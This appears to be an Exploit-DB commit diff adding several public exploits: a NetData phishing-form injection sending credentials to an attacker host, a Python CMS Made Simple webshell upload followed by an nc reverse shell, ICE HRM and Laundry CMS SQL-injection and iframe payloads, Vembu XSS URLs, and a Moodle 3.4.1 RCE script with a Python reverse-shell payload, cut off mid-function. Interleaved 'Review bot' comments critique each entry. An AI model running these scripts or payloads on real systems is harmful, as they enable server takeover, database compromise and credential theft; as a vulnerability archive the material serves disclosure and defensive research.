DB: 2019-03-16

7 changes to exploits/shellcodes

Mail Carrier 2.5.1 - 'MAIL FROM' Buffer Overflow
NetData 1.13.0 - HTML Injection
CMS Made Simple Showtime2 Module 3.6.2 - Authenticated Arbitrary File Upload
ICE HRM 23.0 - Multiple Vulnerabilities
Vembu Storegrid Web Interface 4.4.0 - Multiple Vulnerabilities
Laundry CMS - Multiple Vulnerabilities
Moodle 3.4.1 - Remote Code Execution
Offensive Security 2019-03-16 05:01:58 +00:00
parent b4e61d43c1
commit 790034e7df
8 changed files with 971 additions and 0 deletions


@ -0,0 +1,49 @@
# ************************************************************************
# * Author: Marcelo Vázquez (aka s4vitar) *
# * NetData v1.13.0 HTML Injection Vulnerability *
# ************************************************************************
# Exploit Title: NetData v1.13.0 HTML Injection Vulnerability
# Date: 2019-03-14
# Exploit Author: Marcelo Vázquez (aka s4vitar)
# Collaborators: Victor Lasa (aka vowkin)
# Vendor Homepage: https://my-netdata.io/
# Software Link: https://docs.netdata.cloud/packaging/installer/
# Version: <= NetData v1.13.0
# PoC Video (Credential Harvesting): https://www.youtube.com/watch?v=zSG93yX0B8k
NetData is prone to multiple HTML-injection vulnerabilities.
Successful exploitation will allow attacker-supplied HTML to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
NetData 1.13.0 is vulnerable; other versions may also be affected.
Proof of Concept:
=====================
1. Export a valid snapshot using the "export/save a netdata snapshot" function from the NetData dashboard (top right on the navigation bar).
2. Once it has finished exporting, attackers can manipulate the contents of said snapshot file and inject their own malicious HTML code. An example is provided below:
<div style='position: absolute; left: 0px; top: 0px; width: 1900px; height: 1300px; z-index: 1000; background-color:white; padding: 1em;'>Please login with valid credentials:<br></br><br>Please enter your credentials to see the content:</br><br><form name='login' action='http://attackerIP:port/'><table><tr><td>Username:</td><td><input type='text' name='username'/></td></tr><tr><td>Password:</td><td><input type='text' name='password'/></td></tr><tr><td colspan=2 align=center><input type='submit' value='Login'/></td></tr></table></form></div>
In this case, the attackers perform a credential theft attack where they specify the public IP and port from their own server, which is listening for new connections in order to receive the stolen credentials in plain text.
3. Import the newly modified snapshot using the "import/load a netdata snapshot" function from the NetData dashboard (top right on the navigation bar).
4. Once imported, the victim will see a login form that asks for their credentials.
5. After they are entered, the attacker can visualize said credentials in plain text on his own server, as they are sent through a simple GET request:
root@vps-server:~# nc -nlvp 4646
Listening on [0.0.0.0] (family 0, port 4646)
Connection from [XX.X.XXX.X] port 4646 [tcp/*] accepted (family 2, sport 36930)
GET /?username=test&password=passwordexample HTTP/1.1
Host: XXX.XXX.XX.XX:4646
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://localhost:19999/
Accept-Encoding: gzip, deflate
Accept-Language: es-ES,es;q=0.9,en;q=0.8
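Review bot: the PoC never identifies which field of the exported snapshot is rendered unescaped on import, so neither reproduction nor verification of a fix is possible from this text; step 2 ("attackers can manipulate the contents of said snapshot file and inject their own malicious HTML code") should name the key in the snapshot file that the `<div>` payload is placed in. It should also be stated up front that steps 1 to 3 are all performed in the victim's own dashboard, i.e. the victim has to import an attacker-supplied snapshot file, which makes this a malicious-file issue rather than a remotely triggerable injection; the `Referer: http://localhost:19999/` in the captured request shows exactly that. Minor: "allow attacker-supplied HTML to run in the context of the affected browser" should read "to be rendered", since no script execution is demonstrated, only a phishing form whose credentials leak in the GET query string of a plain-HTTP request to `attackerIP:port`.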

exploits/php/webapps/46546.py Executable file

@ -0,0 +1,75 @@
#!/usr/bin/env python
# Exploit Title: CMS Made Simple (authenticated) arbitrary file upload in Showtime2 module
# Date: March 2019
# Exploit Author: Daniele Scanu @ Certimeter Group
# Vendor Homepage: https://www.cmsmadesimple.org/
# Software Link: http://viewsvn.cmsmadesimple.org/listing.php?repname=showtime2
# Version: Showtime2 module <= 3.6.2
# Tested on: CMS Made Simple 2.2.8 in Ubuntu 18.04
# CVE : 2019-9692
import requests
import optparse
from requests_toolbelt.multipart.encoder import MultipartEncoder
parser = optparse.OptionParser()
parser.add_option('-u', '--url', action="store", dest="url", help="Base target uri (ex. http://192.168.1.10/cms)")
parser.add_option('-U', '--username', action="store", dest="username", help="Username for login", default="admin")
parser.add_option('-P', '--password', action="store", dest="password", help="Password for login", default="password")
parser.add_option('-l', '--local', action="store", dest="local", help="Local uri for reverse shell", default="localhost")
parser.add_option('-p', '--port', action="store", dest="port", help="Local port for reverse shell", default="2222")
options, args = parser.parse_args()
if not options.url:
print "[-] Specify an uri target"
exit()
if not options.username:
print "[-] Specify an username for login in administrator panel"
exit()
if not options.password:
print "[-] Specify a password for login in administrator panel"
exit()
base_uri = options.url
url_login = base_uri + "/admin/login.php"
user = options.username
password = options.password
session = requests.Session()
__c_var = ""
lhost = options.local
lport = options.port
# Login in administrator panel for get the csrf token
def login(username, password):
print "[*] Login to cms"
global __c_var
credentials = {"username": username, "password": password, "loginsubmit": "Submit"}
response = session.post(url_login, data=credentials, allow_redirects=False)
__c_var = response.headers['Location'].split("__c=")[1]
print "[*] Token value: " + __c_var
# upload a php script with reverse shell in vulnerable functionality
def upload_shell():
print "[*] Uploading webshell"
multipart_data = MultipartEncoder(
fields = {
'm1_input_browse': ('shell.php', "<?php system($_REQUEST['cmd']); ?>", 'text/plain'),
'__c': __c_var,
'mact': 'Showtime2,m1_,defaultadmin,0',
'm1_upload_submit': 'Upload'
}
)
response = session.post(base_uri + '/admin/moduleinterface.php', data=multipart_data,
headers={'Content-Type': multipart_data.content_type})
# Call the script uploaded for spawn a reverse shell
def spawn_shell():
print "[*] Spawn a shell to " + lhost + ":" + str(lport)
payload = {"cmd": "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc " + lhost + " " + str(lport) + " >/tmp/f"}
requests.post(base_uri + "/uploads/images/shell.php", data=payload)
login(user, password)
upload_shell()
spawn_shell()
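Review bot: `login()` assumes a successful login always answers with a redirect carrying `__c=` (`__c_var = response.headers['Location'].split("__c=")[1]`); with wrong credentials there is no `Location` header, so the script dies with a `KeyError` traceback instead of the `[-]` message the option handling takes care to print elsewhere. Check that `'Location'` is in `response.headers` and that `"__c="` is present before splitting, and print a clear failure. `upload_shell()` likewise discards `response` without checking the status code or looking for an error string, so a failed upload (module not installed, upload directory other than `/uploads/images/`) is only noticed when `spawn_shell()` silently posts to a 404. Also the `-l` default of `localhost` would make the target connect back to itself; make `--local` mandatory the way `--url` is.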


@ -0,0 +1,69 @@
===========================================================================================
# Exploit Title: ICE HRM - ob SQL Inj.
# Dork: N/A
# Date: 14-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://icehrm.org
# Software Link: https://sourceforge.net/projects/icehrm/
# Version: v23.0
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: ICE Hrm is a Human resource management system for
small and medium sized organizations.
It has a rich UI built with PHP and Java Script.
===========================================================================================
# POC - SQLi (blind)
# Parameters : ob
# Attack Pattern :
1+%2b+((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2f*%27XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%27%7c%22XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%22*%2f
# POST Method : http://localhost/icehrmv23OS/app/service.php
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: ICE HRM - ob SQL Inj.
# Dork: N/A
# Date: 14-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://icehrm.org
# Software Link: https://sourceforge.net/projects/icehrm/
# Version: v23.0
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: ICE Hrm is a Human resource management system for
small and medium sized organizations.
It has a rich UI built with PHP and Java Script.
===========================================================================================
# POC - SQLi (blind)
# Parameters : ob
# Attack Pattern :
1+%2b+((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2f*%27XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%27%7c%22XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%22*%2f
# GET Method :
http://localhost/icehrmv23OS/app/data.php?t=Employee&sm=%7B%22nationality%22:[%22Nationality%22,%22id%22,%22name%22],%22ethnicity%22:[%22Ethnicity%22,%22id%22,%22name%22],%22immigration_status%22:[%22ImmigrationStatus%22,%22id%22,%22name%22],%22employment_status%22:[%22EmploymentStatus%22,%22id%22,%22name%22],%22job_title%22:[%22JobTitle%22,%22id%22,%22name%22],%22pay_grade%22:[%22PayGrade%22,%22id%22,%22name%22],%22country%22:[%22Country%22,%22code%22,%22name%22],%22province%22:[%22Province%22,%22id%22,%22name%22],%22department%22:[%22CompanyStructure%22,%22id%22,%22title%22],%22supervisor%22:[%22Employee%22,%22id%22,%22first_name%20last_name%22]%7D&cl=[%22id%22,%22image%22,%22employee_id%22,%22first_name%22,%22last_name%22,%22mobile_phone%22,%22department%22,%22gender%22,%22supervisor%22]&ft=%7B%22status%22:%22Active%22%7D&ob=1%20%2b%20((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A))%2f*%27XOR(((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)))OR%27%7c%22XOR(((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)))OR%22*%2f
===========================================================================================
===========================================================================================
# Exploit Title: ICE HRM - msg Frame Inj.
# Dork: N/A
# Date: 14-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://icehrm.org
# Software Link: https://sourceforge.net/projects/icehrm/
# Version: v23.0
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: ICE Hrm is a Human resource management system for
small and medium sized organizations.
It has a rich UI built with PHP and Java Script.
===========================================================================================
# POC - Frame Inj.
# Parameters : msg
# Attack Pattern : %3ciframe+src%3d%22http%3a%2f%2fcyber-warrior.org
%2f%3f%22%3e%3c%2fiframe%3e
# GET Method :
http://localhost/icehrmv23OS/app/fileupload_page.php?id=_id_&msg=<iframe
src="http://cyber-warrior.org/
?"></iframe>&file_group=_file_group_&file_type=_file_type_&user=_user_
===========================================================================================
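Review bot: the first `ob` entry (POST to `/app/service.php`) gives no request body, so it cannot be reproduced from this text, and its header is otherwise a verbatim copy of the second entry's; either supply the POST parameters or drop the block, since the GET form against `/app/data.php` is the complete one. Neither entry states whether an authenticated session is required, which matters for severity: `data.php?t=Employee&...&ft={"status":"Active"}` is an employee-listing call and the `fileupload_page.php` PoC carries `user=_user_`, so both look post-authentication; say so explicitly. For the `msg` finding, "Frame Inj." understates it: an unencoded `<iframe>` reflected into the page is reflected HTML injection (XSS), and the PoC should point at an inert placeholder URL rather than a third-party site.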


@ -0,0 +1,22 @@
# Exploit Title: Vembu Storegrid Web Interface 4.4.0 - Multiple Vulnerabilities
# Discovery Date: 2018-12-05
# Exploit Author: Gionathan "John" Reale
# Vendor Homepage: https://www.vembu.com/
# Software Link : N/A
# Google Dork: N/A
# Version: 4.4.0
# CVE : CVE-2014-10078,CVE-2014-10079
Description StoreGrid enables you to offer an automated online backup service to your customers and is designed to be flexible to your needs. Upon investigating the web interface I discovered multiple vulnerabilities.
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
Information Disclosure. The front page of the server web interface leaks the private IP address in the hidden form "ipaddress" around line 80.
==========================================================================================================================
Reflected XSS. The server web interface contains multiple reflected XSS exploits that do not require authentication.
https://xxxxxxxx.xx:6061/interface/registercustomer/onlineregsuccess.php?cn=</font><script>alert(1);</script><font>&result=
https://xxxxxxxx.xx:6061//interface/registercustomer/onlineregsuccess.php?cn=</font><script>alert(1);</script><font>&result=
https://xxxxxxxx.xx:6061/interface/registercustomer/onlineregsuccess.php?cn=</font><script>alert(1);</script><font>&result=
https://xxxxxxxxx.xx:6061/interface/registerreseller/onlineregfailure.php?cn=gar&result=</font><script>alert(1);</script><font>
https://xxxxxxxxx.xx:6061/interface/registerclient/onlineregfailure.php?cn=gar&result=</font><script>alert(1);</script><font>
https://xxxxxxxx.xx:6061/interface/registercustomer/onlineregfailure.php?cn=gar&result=</font><script>alert(1);</script><font>
=============================================================================================================================
Self XSS. The server web interface contains a self XSS in the search function.
==============================================================================================================================
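Review bot: the three `registercustomer/onlineregsuccess.php` URLs are the same payload against the same endpoint (the second differs only by a doubled slash in the path), so they should collapse to one line; the distinct findings are that `cn` is reflected by `onlineregsuccess.php` and `result` by the three `onlineregfailure.php` pages. The CVE line pairs two 2014-numbered IDs with a 2018 discovery date and does not say which ID covers which finding; map them explicitly (reflected XSS vs. information disclosure) or explain why 2014 IDs apply to this report. The self-XSS entry has no PoC, parameter name or path, and the information-disclosure entry cites "around line 80" of the front page without showing the `ipaddress` field markup; both need the same level of detail as the XSS URLs to be actionable.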


@ -0,0 +1,126 @@
===========================================================================================
# Exploit Title: Laundry CMS cloth_code SQL Inj.
# Dork: N/A
# Date: 09-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://laundry.rpcits.co.in/
# Software Link: https://sourceforge.net/projects/laundry/
# Version: New
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: The Laundry Management Application is a very
simple and Online Services
with mobile and computer friendly themes development.
===========================================================================================
# POC - SQLi
# Parameters : cloth_code, cloth_name
# Attack Pattern : %2527
# POST Method : http://localhost/laundry/index.php/admin/cloth_crud/create
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: Laundry CMS Multiple SQL Inj.
# Dork: N/A
# Date: 09-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://laundry.rpcits.co.in/
# Software Link: https://sourceforge.net/projects/laundry/
# Version: New
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: The Laundry Management Application is a very
simple and Online Services
with mobile and computer friendly themes development.
===========================================================================================
# POC - SQLi
# Parameters : last_name, password, email, phone, first_name, status,
join_date, address,
# Attack Pattern : %2527
# POST Method : http://localhost/laundry/index.php/admin/customer_crud/create
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: Laundry CMS Multiple SQL Inj.
# Dork: N/A
# Date: 09-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://laundry.rpcits.co.in/
# Software Link: https://sourceforge.net/projects/laundry/
# Version: New
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: The Laundry Management Application is a very
simple and Online Services
with mobile and computer friendly themes development.
===========================================================================================
# POC - SQLi
# Parameters : last_name, password, email, phone, first_name, status,
join_date, address, gender
# Attack Pattern : %2527
# POST Method : http://localhost/laundry/index.php/admin/employee_crud/new
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: Laundry CMS expse_code SQL Inj.
# Dork: N/A
# Date: 09-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://laundry.rpcits.co.in/
# Software Link: https://sourceforge.net/projects/laundry/
# Version: New
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: The Laundry Management Application is a very
simple and Online Services
with mobile and computer friendly themes development.
===========================================================================================
# POC - SQLi
# Parameters : expse_code, expse_type, expse_id
# Attack Pattern : %2527
# POST Method : http://localhost/laundry/index.php/admin/expenses_crud/create
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: Laundry CMS service_code SQL Inj.
# Dork: N/A
# Date: 09-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://laundry.rpcits.co.in/
# Software Link: https://sourceforge.net/projects/laundry/
# Version: New
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: The Laundry Management Application is a very
simple and Online Services
with mobile and computer friendly themes development.
===========================================================================================
# POC - SQLi
# Parameters : service_code, service_name
# Attack Pattern : %2527
# POST Method : http://localhost/laundry/index.php/admin/service_crud/create
===========================================================================================
===========================================================================================
# Exploit Title: Laundry CMS Multiple Frame Inj.
# Dork: N/A
# Date: 09-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://laundry.rpcits.co.in/
# Software Link: https://sourceforge.net/projects/laundry/
# Version: New
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: The Laundry Management Application is a very simple and Online Services
with mobile and computer friendly themes development.
===========================================================================================
# POC - Frame Inj.
# Parameters : cloth_name, service_name, expse_type
# Attack Pattern : %3ciframe+src%3d%22http%3a%2f%2fcyber-warrior.org%2f%3f%22%3e%3c%2fiframe%3e
# POST Method : http://localhost/laundry/index.php/admin/service_crud/create
===========================================================================================
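Review bot: the "Multiple Frame Inj." block lists `cloth_name`, `service_name` and `expse_type` as parameters but a single `service_crud/create` endpoint, while the preceding SQLi blocks place `cloth_name` on `cloth_crud/create` and `expse_type` on `expenses_crud/create`; give one endpoint per parameter or split the block. The SQLi entries show only the probe (`%2527`, a double-encoded single quote) and no observed response, so they document an error on malformed input rather than a demonstrated injection; include the database error text or a boolean/time-based confirmation such as the `SLEEP(25)` pattern used in the ICE HRM entries of this same commit. `Version: New` is not a version; give the release number or the SourceForge file date. As with the other frame-injection PoCs, the iframe should point at an inert placeholder URL rather than a third-party site.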


@ -0,0 +1,512 @@
<?php
/**
* Exploit Title: Moodle v3.4.1 RCE Exploit
* Google Dork: inurl:"/course/jumpto.php?jump="
* Date: 15 March 2019
* Exploit Author: Darryn Ten
* Vendor Homepage: https://moodle.org
* Software Link: https://github.com/moodle/moodle/archive/v3.4.1.zip
* Version: 3.4.1 (Possibly < 3.5.0 and maybe even 3.x)
* Tested on: Linux with Moodle v3.4.1
* CVE : CVE-2018-1133
*
* This exploit is based on information provided by Robin Peraglie.
* Additional Reading: https://blog.ripstech.com/2018/moodle-remote-code-execution
*
* A user with the teacher role is able to execute arbitrary code.
*
* Usage:
*
* > php MoodleExploit.php url=http://example.com user=teacher pass=password ip=10.10.10.10 port=1010 course=1
*
* user The account username
* pass The password to the account
* ip Callback IP
* port Callback Port
* course Valid course ID belonging to the teacher
*
* Make sure you're running a netcat listener on the specified port before
* executing this script.
*
* > nc -lnvp 1010
*
* This will attempt to open up a reverse shell to the listening IP and port.
*
* You can start the script with `debug=true` to enable debug mode.
*/
namespace exploit {
class moodle {
public $ip;
public $port;
public $courseId;
public $cookie_jar;
public $url;
public $pass;
public $payload;
public $quizId = false;
public $moodleSession = false;
public $moodleKey;
// Verification patterns
public $loginSuccessMatch = "/course.view\.php/";
public $courseSuccessMatch = "/.\/i.Edit.settings.\/a./";
public $editSuccessMatch = "/.view.php\?id=2&notifyeditingon=1/";
public $quizSuccessMatch = "/.title.Editing.Quiz.\/title./";
public $quizConfigMatch = "/title.*xxxx.\/title./";
public $evilSuccess = "/The\ wild\ cards\ \<strong\>\{x..\}\<\/strong\>\ will\ be\ substituted/";
public $debug;
public function __construct($url, $user, $pass, $ip, $port, $course, $debug) {
$this->cookie_jar = tempnam("/tmp","cookie");
$this->url = $url;
$this->pass = $pass;
$this->ip = $ip;
$this->port = $port;
$this->courseId = $course;
$this->debug = $debug;
// Inject a reverse shell
// You could modify this payload to inject whatever you like
$this->payload = "(python+-c+'import+socket,subprocess,os%3bs%3dsocket.socket(socket.AF_INET,socket.SOCK_STREAM)%3bs.connect((\"".$this->ip."\",".$this->port."))%3bos.dup2(s.fileno(),0)%3b+os.dup2(s.fileno(),1)%3b+os.dup2(s.fileno(),2)%3bp%3dsubprocess.call([\"/bin/sh\",\"-i\"])%3b')";
echo("\n\r");
echo("*------------------------------*\n\r");
echo("* Noodle [Moodle RCE] (v3.4.1) *\n\r");
echo("*------------------------------*\n\r");
echo("\n\r");
echo("[!] Make sure you have a listener\n\r");
echo(sprintf("[!] at %s:%s\n\r", $this->ip, $this->port));
echo("\n\r");
$this->login($url, $user, $pass);
$this->loadCourse($this->courseId);
$this->enableEdit();
$this->addQuiz();
$this->editQuiz();
$this->addCalculatedQuestion();
$this->addEvilQuestion();
$this->exploit();
echo "[*] DONE\n\r";
die();
}
function login($url, $user, $pass) {
echo(sprintf("[*] Logging in as user %s with password %s \n\r", $user, $pass));
$data = [
"anchor" => "",
"username" => $user,
"password" => $pass
];
$result = $this->httpPost("/login/index.php", $data);
if (!preg_match($this->loginSuccessMatch, $result["body"])) {
echo "[-] LOGIN FAILED!\n\r";
echo "[?] Do you have the right credentials and url?\n\r";
die();
}
$matches = [];
$cookies = preg_match_all("/MoodleSession=(.*); path=/", $result["header"], $matches);
$this->moodleSession = $matches[1][1];
$matches = [];
$key = preg_match_all("/sesskey\":\"(.*)\",\"themerev/", $result["body"], $matches);
$this->moodleKey = $matches[1][0];
echo "[+] Successful Login\n\r";
echo sprintf("[>] Moodle Session %s \n\r", $this->moodleSession);
echo sprintf("[>] Moodle Key %s \n\r", $this->moodleKey);
}
function loadCourse($id) {
echo(sprintf("[*] Loading Course ID %s \n\r", $id));
$result = $this->httpGet(sprintf("/course/view.php?id=%s", $id), $this->moodleSession);
if (!preg_match($this->courseSuccessMatch, $result["body"])) {
echo "[-] LOADING COURSE FAILED!\n\r";
echo "[?] Does the course exist and belong to the teacher?\n\r";
die();
}
echo "[+] Successfully Loaded Course\n\r";
}
function enableEdit() {
echo(sprintf("[*] Enable Editing\n\r"));
$result = $this->httpGet(sprintf(
"/course/view.php?id=%s&sesskey=%s&edit=on",
$this->courseId,
$this->moodleKey
), $this->moodleSession);
if (!preg_match($this->editSuccessMatch, $result["header"])) {
echo "[-] ENABLE EDITING FAILED!\n\r";
echo "[?] Does the user have the teacher role?\n\r";
die();
}
echo "[+] Successfully Enabled Course Editing\n\r";
}
function addQuiz() {
echo(sprintf("[*] Adding Quiz\n\r"));
$data = [
"course" => $this->courseId,
"sesskey" => $this->moodleKey,
"jump" => urlencode(sprintf(
"/course/mod.php?id=%s&sesskey=%s&str=0&add=quiz&section=0",
$this->courseId,
$this->moodleKey
)),
];
$result = $this->httpPost("/course/jumpto.php", $data, $this->moodleSession);
if (!preg_match($this->quizSuccessMatch, $result["body"])) {
echo "[-] ADD QUIZ FAILED!\n\r";
die();
}
echo "[+] Successfully Added Quiz\n\r";
echo "[*] Configuring New Quiz\n\r";
$submit = [
"grade" => 10,
"boundary_repeats" => 1,
"completionunlocked" => 1,
"course" => $this->courseId,
"coursemodule" => "",
"section" => 0,
"module" => 16,
"modulename" => "quiz",
"instance" => "",
"add" => "quiz",
"update" => 0,
"return" => 0,
"sr" => 0,
"sesskey" => $this->moodleKey,
"_qf__mod_quiz_mod_form" => 1,
"mform_showmore_id_layouthdr" => 0,
"mform_showmore_id_interactionhdr" => 0,
"mform_showmore_id_display" => 0,
"mform_showmore_id_security" => 0,
"mform_isexpanded_id_general" => 1,
"mform_isexpanded_id_timing" => 0,
"mform_isexpanded_id_modstandardgrade" => 0,
"mform_isexpanded_id_layouthdr" => 0,
"mform_isexpanded_id_interactionhdr" => 0,
"mform_isexpanded_id_reviewoptionshdr" => 0,
"mform_isexpanded_id_display" => 0,
"mform_isexpanded_id_security" => 0,
"mform_isexpanded_id_overallfeedbackhdr" => 0,
"mform_isexpanded_id_modstandardelshdr" => 0,
"mform_isexpanded_id_availabilityconditionsheader" => 0,
"mform_isexpanded_id_activitycompletionheader" => 0,
"mform_isexpanded_id_tagshdr" => 0,
"mform_isexpanded_id_competenciessection" => 0,
"name" => "xxxx",
"introeditor[text]" => "<p>xxxx<br></p>",
"introeditor[format]" => 1,
"introeditor[itemid]" => 966459952,
"showdescription" => 0,
"overduehandling" => "autosubmit",
"gradecat" => 1,
"gradepass" => "",
"attempts" => 0,
"grademethod" => 1,
"questionsperpage" => 1,
"navmethod" => "free",
"shuffleanswers" => 1,
"preferredbehaviour" => "deferredfeedback",
"attemptonlast" => 0,
"attemptimmediately" => 1,
"correctnessimmediately" => 1,
"marksimmediately" => 1,
"specificfeedbackimmediately" => 1,
"generalfeedbackimmediately" => 1,
"rightanswerimmediately" => 1,
"overallfeedbackimmediately" => 1,
"attemptopen" => 1,
"correctnessopen" => 1,
"marksopen" => 1,
"specificfeedbackopen" => 1,
"generalfeedbackopen" => 1,
"rightansweropen" => 1,
"overallfeedbackopen" => 1,
"showuserpicture" => 0,
"decimalpoints" => 2,
"questiondecimalpoints" => -1,
"showblocks" => 0,
"quizpassword" => "",
"subnet" => "",
"browsersecurity" => "-",
"feedbacktext[0][text]" => "",
"feedbacktext[0][format]" => 1,
"feedbacktext[0][itemid]" => 754687559,
"feedbackboundaries[0]" => "",
"feedbacktext[1][text]" => "",
"feedbacktext[1][format]" => 1,
"feedbacktext[1][itemid]" => 88204176,
"visible" => 1,
"cmidnumber" => "",
"groupmode" => 0,
"availabilityconditionsjson" => urlencode("{\"op\":\"&\",\"c\":[],\"showc\":[]}"),
"completion" => 1,
"tags" => "_qf__force_multiselect_submission",
"competency_rule" => 0,
"submitbutton" => "Save and display"
];
$result = $this->httpPost("/course/modedit.php", $submit, $this->moodleSession);
if (!preg_match($this->quizConfigMatch, $result["body"])) {
echo "[-] CONFIGURE QUIZ FAILED!\n\r";
die();
}
$matches = [];
$quiz = preg_match_all("/quiz\/view.php.id=(.*)&forceview=1/", $result["header"], $matches);
$this->quizId = $matches[1][0];
echo "[+] Successfully Configured Quiz\n\r";
}
function editQuiz() {
echo(sprintf("[*] Loading Edit Quiz Page \n\r"));
$result = $this->httpGet(sprintf("/mod/quiz/edit.php?cmid=%s", $this->quizId), $this->moodleSession);
if (!preg_match("/.title.Editing quiz: xxxx.\/title/", $result["body"])) {
echo "[-] LOADING EDITING PAGE FAILED!\n\r";
die();
}
echo "[+] Successfully Loaded Edit Quiz Page\n\r";
}
function addCalculatedQuestion() {
echo(sprintf("[*] Adding Calculated Question \n\r"));
$endpoint = "/question/question.php?courseid=".$this->courseId."&sesskey=".$this->moodleKey."&qtype=calculated&returnurl=%2Fmod%2Fquiz%2Fedit.php%3Fcmid%3D".$this->quizId."%26addonpage%3D0&cmid=".$this->quizId."&category=2&addonpage=0&appendqnumstring=addquestion'";
$result = $this->httpGet($endpoint, $this->moodleSession);
if (!preg_match("/title.Editing\ a\ Calculated\ question.\/title/", $result["body"])) {
echo "[-] ADDING CALCULATED QUESTION FAILED!\n\r";
die();
}
echo "[+] Successfully Added Calculation Question\n\r";
}
function addEvilQuestion() {
echo(sprintf("[*] Adding Evil Question \n\r"));
$payload = [
"initialcategory" => 1,
"reload" => 1,
"shuffleanswers" => 1,
"answernumbering" => "abc",
"mform_isexpanded_id_answerhdr" => 1,
"noanswers" => 1,
"nounits" => 1,
"numhints" => 2,
"synchronize" => "",
"wizard" => "datasetdefinitions",
"id" => "",
"inpopup" => 0,
"cmid" => $this->quizId,
"courseid" => 2,
"returnurl" => sprintf("/mod/quiz/edit.php?cmid=%s&addonpage=0", $this->quizId),
"scrollpos" => 0,
"appendqnumstring" => "addquestion",
"qtype" => "calculated",
"makecopy" => 0,
"sesskey" => $this->moodleKey,
"_qf__qtype_calculated_edit_form" => 1,
"mform_isexpanded_id_generalheader" => 1,
"mform_isexpanded_id_unithandling" => 0,
"mform_isexpanded_id_unithdr" => 0,
"mform_isexpanded_id_multitriesheader" => 0,
"mform_isexpanded_id_tagsheader" => 0,
"category" => "2,23",
"name" => "zzzz",
"questiontext[text]" => "<p>zzzz<br></p>",
"questiontext[format]" => 1,
"questiontext[itemid]" => 999787569,
"defaultmark" => 1,
"generalfeedback[text]" => "",
"generalfeedback[format]" => 1,
"generalfeedback[itemid]" => 729029157,
"answer[0]" => ' /*{a*/`$_GET[0]`;//{x}}',
"fraction[0]" => "1.0",
"tolerance[0]" => "0.01",
"tolerancetype[0]" => 1,
"correctanswerlength[0]" => 2,
"correctanswerformat[0]" => 1,
"feedback[0][text]" => "",
"feedback[0][format]" => 1,
"feedback[0][itemid]" => 928615051,
"unitrole" => 3,
"penalty" => "0.3333333",
"hint[0]text]" => "",
"hint[0]format]" => 1,
"hint[0]itemid]" => 236679070,
"hint[1]text]" => "",
"hint[1]format]" => 1,
"hint[1]itemid]" => 272691514,
"tags" => "_qf__force_multiselect_submission",
"submitbutton" => "Save change"
];
$result = $this->httpPost("/question/question.php", $payload, $this->moodleSession);
if (!preg_match($this->evilSuccess, $result["body"])) {
echo "[-] EVIL QUESTION CREATION FAILED!\n\r";
die();
}
echo "[+] Successfully Created Evil Question\n\r";
}
function exploit() {
echo "[*] Sending Exploit\n\r";
echo "\n\r";
if ($this->debug) {
echo "[D] Payload: \n\r";
echo sprintf("[>] %s \n\r", $this->payload);
}
$exploitUrl = sprintf(
"/question/question.php?returnurl=%s&addonpage=0&appendqnumstring=addquestion&scrollpos=0&id=8&wizardnow=datasetitems&cmid=%s&0=(%s)",
urlencode(sprintf(
"/mod/quiz/edit.php?cmid=%s",
$this->quizId)
),
$this->quizId,
$this->payload);
if ($this->debug) {
echo sprintf("[D] Exploit URL: %s \n\r", $exploitUrl);
}
echo sprintf("[>] You should receive a reverse shell attempt from the target at %s on port %s \n\r", $this->ip, $this->port);
echo sprintf("[>] If connection was successful this program will wait here until you close the connection.\n\r");
echo sprintf("[>] You should be able to Ctrl+C and retain the connection through netcat.\n\r");
$this->httpGet($exploitUrl, $this->moodleSession);
}
function httpPost($url, $data, $session = false, $json = false)
{
if ($this->debug) {
echo(sprintf("[D] Doing HTTP POST to URL: %s \n\r", $url));
echo(sprintf("[D] Session: %s \n\r", $session));
echo(sprintf("[D] Data: %s \n\r", json_encode($data)));
echo("\n\r");
}
$curl = curl_init(sprintf("%s%s", $this->url, $url));
$headers = [];
if ($session) {
array_push($headers, sprintf("Cookie: MoodleSession=%s", $session));
}
if ($json) {
